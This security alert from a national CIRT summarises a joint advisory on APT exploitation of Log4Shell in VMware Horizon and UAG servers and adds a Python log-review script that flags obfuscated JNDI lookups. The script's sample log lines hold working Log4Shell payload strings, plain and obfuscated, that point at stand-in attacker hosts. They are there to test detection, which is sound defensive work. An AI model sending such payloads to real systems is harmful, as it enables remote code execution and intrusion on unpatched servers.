The Cybersecurity and Infrastructure Security Agency (CISA) and the United States Coast Guard Cyber Command (CGCYBER) issued a joint Cybersecurity Advisory (CSA) on June 23, 2022. It was released to alert network defenders to Advanced Persistent Threat (APT) actors' continued exploitation of CVE-2021-44228 (Log4Shell) in unpatched VMware Horizon and Unified Access Gateway (UAG) servers.
Multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers. As part of this exploitation, suspected APT actors installed loader malware on compromised systems; the loaders contained embedded executables that enabled remote command and control (C2). In one confirmed compromise, the actors then moved laterally inside the network and collected and exfiltrated sensitive data.
How it works
CVE-2021-44228 allows an unauthenticated attacker to execute arbitrary code on a vulnerable host or container by exploiting a flaw in the Log4j logging library. The attacker sends a specially crafted request containing a lookup string of the form ${jndi:...} in any field the application logs (for example a header or URL parameter); when the string is logged, Log4j resolves the JNDI lookup, fetches the attacker-supplied resource from a server the attacker controls, and executes it. A successful request gives the attacker complete control of the affected system.
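Because the exploit payload travels inside a field that gets logged, the attempts are often visible in web or reverse-proxy request logs, and attackers commonly obfuscate the ${jndi:...} string with nested Log4j lookups (${lower:j}, ${::-j}, ${env:NaN:-j}) to evade naive signatures. The following is an added example written for this alert, not code from the CISA/CGCYBER advisory: it collapses the common obfuscations inside-out and then looks for a JNDI lookup. The log lines are constructed (203.0.113.0/24 is a documentation range), and the list of JNDI schemes is an assumption based on what Log4j 2.x JNDI lookups can reach.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample request-log lines (not taken from the advisory). The last
# field is the logged User-Agent; 203.0.113.0/24 is a documentation range.
SAMPLE_LOG_LINES = [
    '10.0.0.5 "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.6 "GET /portal/ HTTP/1.1" 200 "${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://203.0.113.7:1389/a}"',
    '10.0.0.7 "GET /portal/ HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.8/x}"',
    '10.0.0.8 "GET /portal/ HTTP/1.1" 200 "${${env:NaN:-j}ndi:${env:NaN:-l}dap://203.0.113.9/x}"',
    '10.0.0.9 "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0 (Windows NT 10.0)"',
    '10.0.0.10 "GET /portal/ HTTP/1.1" 200 "price is ${amount} today"',
]

# An innermost ${...} lookup: no nested '$', '{' or '}' inside it.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Log4j default-value syntax ${name:-default}; 'name' may be empty or contain ':'.
DEFAULT_VALUE = re.compile(r"^(.*?):-(.*)$", re.S)
# A JNDI lookup with one of the schemes assumed reachable from Log4j 2.x
# (Log4j matches lookup prefixes case-insensitively, hence re.I).
JNDI_LOOKUP = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?):", re.I)


def _resolve_static(content: str) -> Optional[str]:
    """Literal text a non-JNDI Log4j lookup collapses to, or None if not static."""
    low = content.lower()
    if low.startswith("lower:"):
        return content[len("lower:"):].lower()
    if low.startswith("upper:"):
        return content[len("upper:"):].upper()
    m = DEFAULT_VALUE.match(content)
    if m and not m.group(1).lower().startswith("jndi"):
        # An unknown variable (e.g. '::' or 'env:NaN') falls back to its default.
        return m.group(2)
    return None


def normalize_lookups(text: str, max_passes: int = 20) -> str:
    """Collapse nested obfuscating lookups inside-out until nothing changes."""
    for _ in range(max_passes):
        changed = False

        def replace(m) -> str:
            nonlocal changed
            literal = _resolve_static(m.group(1))
            if literal is None:
                return m.group(0)  # leave JNDI and unknown lookups untouched
            changed = True
            return literal

        text = INNERMOST_LOOKUP.sub(replace, text)
        if not changed:
            break
    return text


def find_log4shell_attempts(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line index, JNDI scheme, normalized line) for each suspicious line."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize_lookups(line)
        m = JNDI_LOOKUP.search(norm)
        if m:
            hits.append((i, m.group(1).lower(), norm))
    return hits


if __name__ == "__main__":
    for idx, scheme, norm in find_log4shell_attempts(SAMPLE_LOG_LINES):
        print(f"line {idx}: jndi/{scheme} -> {norm}")
```

Run against the sample lines, the four obfuscated and plain payloads are flagged and the two benign lines (including the harmless ${amount} placeholder) are not. This is a review aid for identifying attempts in captured logs, not a protection: signature matching can be evaded, and the only complete remediation is updating the affected Horizon and UAG systems as the advisory directs.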
The Guyana National CIRT encourages organizations with vulnerable VMware Horizon and UAG systems to update all affected systems to the latest version, and to use the tactics, techniques and procedures (TTPs) and indicators of compromise (IOCs) published in the advisory to examine and remediate affected and associated systems.
The Guyana National CIRT recommends that users and administrators review this alert and apply it where necessary.
PDF Download: Log4Shell is still being exploited.pdf
APT actors continue exploitation of Log4Shell in VMware products. (2022, June 28). Retrieved from Canadian Centre for Cyber Security.
Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems. (2022, June 23). Retrieved from Cybersecurity and Infrastructure Security Agency (CISA).